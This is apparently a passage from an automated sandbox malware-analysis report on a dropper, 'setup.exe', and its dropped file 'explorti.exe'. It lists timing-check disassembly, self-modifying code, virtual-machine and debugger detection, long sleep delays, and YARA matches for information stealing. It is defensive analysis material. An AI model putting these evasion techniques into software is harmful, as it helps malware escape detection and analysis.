Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DF085A second address: 4DF0883 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF32CFB7205h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DF0883 second address: 4DF08A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6571h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF32CDD656Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DF0C27 second address: 4DF0CCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF32CFB7201h 0x00000009 or cx, AB96h 0x0000000e jmp 00007FF32CFB7201h 0x00000013 popfd 0x00000014 movzx ecx, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c movzx esi, dx 0x0000001f call 00007FF32CFB71FBh 0x00000024 pushfd 0x00000025 jmp 00007FF32CFB7208h 0x0000002a or ecx, 048D1E18h 0x00000030 jmp 00007FF32CFB71FBh 0x00000035 popfd 0x00000036 pop eax 0x00000037 popad 0x00000038 mov dword ptr [esp], ebp 0x0000003b jmp 00007FF32CFB71FFh 0x00000040 mov ebp, esp 0x00000042 pushad 0x00000043 mov ebx, esi 0x00000045 mov dx, si 0x00000048 popad 0x00000049 push dword ptr [ebp+0Ch] 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FF32CFB7209h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DF0CCF second address: 4DF0CDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CDD656Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DF0CDF second address: 4DF0CF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF32CFB71FAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DF0CF6 second address: 4DF0D2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 jmp 00007FF32CDD656Ah 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e call 00007FF32CDD6569h 0x00000013 jmp 00007FF32CDD6570h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e mov eax, 37BA5829h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DF0D2E second address: 4DF0D6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FF32CFB7209h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF32CFB71FCh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DF0D6E second address: 4DF0D80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CDD656Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DF0D80 second address: 4DF0DBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007FF32CFB7209h 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FF32CFB71FDh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DA0526 second address: 4DA052C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DA052C second address: 4DA0530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DA0530 second address: 4DA05A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov edx, ecx 0x0000000c call 00007FF32CDD6570h 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 popad 0x00000015 mov dword ptr [esp], ebp 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FF32CDD656Dh 0x0000001f and ax, E536h 0x00000024 jmp 00007FF32CDD6571h 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007FF32CDD6570h 0x00000030 sbb ecx, 2AE92C58h 0x00000036 jmp 00007FF32CDD656Bh 0x0000003b popfd 0x0000003c popad 0x0000003d mov ebp, esp 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DA05A5 second address: 4DA05A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DA05A9 second address: 4DA05AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DA05AF second address: 4DA05F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push FFFFFFFEh 0x0000000b jmp 00007FF32CFB7200h 0x00000010 push FDA9B50Dh 0x00000015 jmp 00007FF32CFB7201h 0x0000001a add dword ptr [esp], 79980B0Bh 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 mov bl, ah 0x00000026 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DA05F1 second address: 4DA0649 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF32CDD656Fh 0x00000008 add ch, FFFFFFDEh 0x0000000b jmp 00007FF32CDD6579h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov edi, esi 0x00000015 popad 0x00000016 call 00007FF32CDD6569h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FF32CDD6579h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DA0649 second address: 4DA0679 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7201h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF32CFB7201h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 mov esi, ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DA0679 second address: 4DA0731 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF32CDD6579h 0x00000008 and ax, D986h 0x0000000d jmp 00007FF32CDD6571h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007FF32CDD6570h 0x0000001b add ch, 00000028h 0x0000001e jmp 00007FF32CDD656Bh 0x00000023 popfd 0x00000024 popad 0x00000025 mov eax, dword ptr [eax] 0x00000027 jmp 00007FF32CDD6579h 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 jmp 00007FF32CDD6571h 0x00000035 pop eax 0x00000036 jmp 00007FF32CDD656Eh 0x0000003b mov eax, dword ptr fs:[00000000h] 0x00000041 pushad 0x00000042 mov dx, ax 0x00000045 mov ecx, 176D2139h 0x0000004a popad 0x0000004b nop 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007FF32CDD656Eh 0x00000055 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DA0731 second address: 4DA0740 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DA0740 second address: 4DA0747 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 94h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DA0747 second address: 4DA0806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FF32CFB7207h 0x0000000d nop 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FF32CFB7204h 0x00000015 add ax, 5808h 0x0000001a jmp 00007FF32CFB71FBh 0x0000001f popfd 0x00000020 push eax 0x00000021 pop ecx 0x00000022 popad 0x00000023 sub esp, 1Ch 0x00000026 pushad 0x00000027 mov esi, edx 0x00000029 mov cx, di 0x0000002c popad 0x0000002d push esi 0x0000002e jmp 00007FF32CFB7202h 0x00000033 mov dword ptr [esp], ebx 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007FF32CFB71FEh 0x0000003d adc ch, FFFFFFC8h 0x00000040 jmp 00007FF32CFB71FBh 0x00000045 popfd 0x00000046 mov edx, ecx 0x00000048 popad 0x00000049 xchg eax, esi 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d movsx edx, si 0x00000050 pushfd 0x00000051 jmp 00007FF32CFB7208h 0x00000056 xor ecx, 77A45258h 0x0000005c jmp 00007FF32CFB71FBh 0x00000061 popfd 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DA0806 second address: 4DA084F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6579h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF32CDD6571h 0x0000000f xchg eax, esi 0x00000010 jmp 00007FF32CDD656Eh 0x00000015 xchg eax, edi 0x00000016 pushad 0x00000017 mov eax, 3666D7ADh 0x0000001c push eax 0x0000001d push edx 0x0000001e mov edx, esi 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DA084F second address: 4DA0877 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 1B0168EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c mov cl, dl 0x0000000e mov esi, 576EE9BFh 0x00000013 popad 0x00000014 xchg eax, edi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FF32CFB7201h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DA0877 second address: 4DA0919 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6571h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [7743B370h] 0x0000000e jmp 00007FF32CDD656Eh 0x00000013 xor dword ptr [ebp-08h], eax 0x00000016 pushad 0x00000017 movzx ecx, dx 0x0000001a call 00007FF32CDD6573h 0x0000001f pushad 0x00000020 popad 0x00000021 pop esi 0x00000022 popad 0x00000023 xor eax, ebp 0x00000025 pushad 0x00000026 mov al, 9Eh 0x00000028 popad 0x00000029 push edx 0x0000002a pushad 0x0000002b jmp 00007FF32CDD6572h 0x00000030 jmp 00007FF32CDD6572h 0x00000035 popad 0x00000036 mov dword ptr [esp], eax 0x00000039 jmp 00007FF32CDD6570h 0x0000003e lea eax, dword ptr [ebp-10h] 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FF32CDD6577h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DA0919 second address: 4DA0960 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF32CFB71FFh 0x00000009 or ax, A41Eh 0x0000000e jmp 00007FF32CFB7209h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr fs:[00000000h], eax 0x0000001f pushad 0x00000020 mov eax, 0E068F39h 0x00000025 push eax 0x00000026 push edx 0x00000027 push ecx 0x00000028 pop ebx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DA0960 second address: 4DA0A94 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF32CDD6570h 0x00000008 sbb cl, 00000048h 0x0000000b jmp 00007FF32CDD656Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 mov esi, dword ptr [ebp+08h] 0x00000017 jmp 00007FF32CDD6576h 0x0000001c mov eax, dword ptr [esi+10h] 0x0000001f jmp 00007FF32CDD6570h 0x00000024 test eax, eax 0x00000026 pushad 0x00000027 mov ax, 806Dh 0x0000002b mov bx, ax 0x0000002e popad 0x0000002f jne 00007FF39F3758CEh 0x00000035 jmp 00007FF32CDD6574h 0x0000003a sub eax, eax 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007FF32CDD6577h 0x00000043 sbb ch, FFFFFFFEh 0x00000046 jmp 00007FF32CDD6579h 0x0000004b popfd 0x0000004c push esi 0x0000004d pushfd 0x0000004e jmp 00007FF32CDD6577h 0x00000053 sbb cl, 0000000Eh 0x00000056 jmp 00007FF32CDD6579h 0x0000005b popfd 0x0000005c pop ecx 0x0000005d popad 0x0000005e mov dword ptr [ebp-20h], eax 0x00000061 jmp 00007FF32CDD6577h 0x00000066 mov ebx, dword ptr [esi] 0x00000068 jmp 00007FF32CDD6576h 0x0000006d mov dword ptr [ebp-24h], ebx 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007FF32CDD6577h 0x00000077 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 31EFBC second address: 31E7EC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c pushad 0x0000000d cld 0x0000000e mov dword ptr [ebp+122D1CC1h], edi 0x00000014 popad 0x00000015 push dword ptr [ebp+122D0B15h] 0x0000001b mov dword ptr [ebp+122D1C24h], ebx 0x00000021 call dword ptr [ebp+122D26DAh] 0x00000027 pushad 0x00000028 sub dword ptr [ebp+122D1B97h], ecx 0x0000002e xor eax, eax 0x00000030 mov dword ptr [ebp+122D1B97h], eax 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a jmp 00007FF32CFB7208h 0x0000003f mov dword ptr [ebp+122D34ECh], eax 0x00000045 mov dword ptr [ebp+122D1B97h], eax 0x0000004b mov esi, 0000003Ch 0x00000050 jp 00007FF32CFB71F7h 0x00000056 add esi, dword ptr [esp+24h] 0x0000005a jmp 00007FF32CFB7209h 0x0000005f lodsw 0x00000061 clc 0x00000062 add eax, dword ptr [esp+24h] 0x00000066 clc 0x00000067 mov ebx, dword ptr [esp+24h] 0x0000006b pushad 0x0000006c mov dword ptr [ebp+122D1B97h], ecx 0x00000072 sub eax, dword ptr [ebp+122D3414h] 0x00000078 popad 0x00000079 nop 0x0000007a pushad 0x0000007b jbe 00007FF32CFB71FCh 0x00000081 jp 00007FF32CFB71F6h 0x00000087 push edi 0x00000088 push eax 0x00000089 push edx 0x0000008a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 31E7EC second address: 31E7FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FF32CDD6566h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 479D49 second address: 479D6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF32CFB7205h 0x0000000a jl 00007FF32CFB71F6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 495EAE second address: 495EB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 495EB2 second address: 495F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CFB7206h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FF32CFB7208h 0x00000011 jmp 00007FF32CFB7209h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 495F02 second address: 495F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe Special instruction interceptor: First address: C8E792 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe Special instruction interceptor: First address: C8E835 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe Special instruction interceptor: First address: E2F857 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe Special instruction interceptor: First address: E3CFB4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe Special instruction interceptor: First address: EC77FB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 31E792 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 31E835 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 4BF857 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 4CCFB4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 5577FB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_04DF04DA rdtsc 0_2_04DF04DA
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 408
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 499
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 8164
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4416 Thread sleep count: 49 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4416 Thread sleep time: -98049s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 1424 Thread sleep count: 39 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 1424 Thread sleep time: -78039s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 2740 Thread sleep count: 408 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 2740 Thread sleep time: -12240000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3660 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4040 Thread sleep count: 499 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4040 Thread sleep time: -998499s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4040 Thread sleep count: 8164 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4040 Thread sleep time: -16336164s >= -30000s
Source: C:\Users\user\Desktop\setup.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000
Source: explorti.exe, explorti.exe, 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: explorti.exe, 0000000A.00000002.3368400813.0000000001719000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
Source: explorti.exe, 0000000A.00000002.3368400813.000000000174B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: setup.exe, 00000000.00000002.2185921092.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000002.00000002.2229049085.00000000004A1000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000003.00000002.2230169054.00000000004A1000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\setup.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\setup.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\setup.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: SIWVID
Source: C:\Users\user\Desktop\setup.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_04DF04DA rdtsc 0_2_04DF04DA
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 10_2_002E645B mov eax, dword ptr fs:[00000030h] 10_2_002E645B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 10_2_002EA1C2 mov eax, dword ptr fs:[00000030h] 10_2_002EA1C2
Source: C:\Users\user\Desktop\setup.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: explorti.exe, explorti.exe, 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: 35Program Manager
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 10_2_002CD312 cpuid 10_2_002CD312
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 10_2_002CCB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 10_2_002CCB1A
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 10_2_002B65B0 LookupAccountNameA, 10_2_002B65B0

Stealing of Sensitive Information

Source: Yara match File source: 3.2.explorti.exe.2b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.setup.exe.c20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.explorti.exe.2b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.explorti.exe.2b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2228974412.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2724598095.0000000005300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2189691685.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2188519642.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2184897638.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2230067978.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2141203577.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY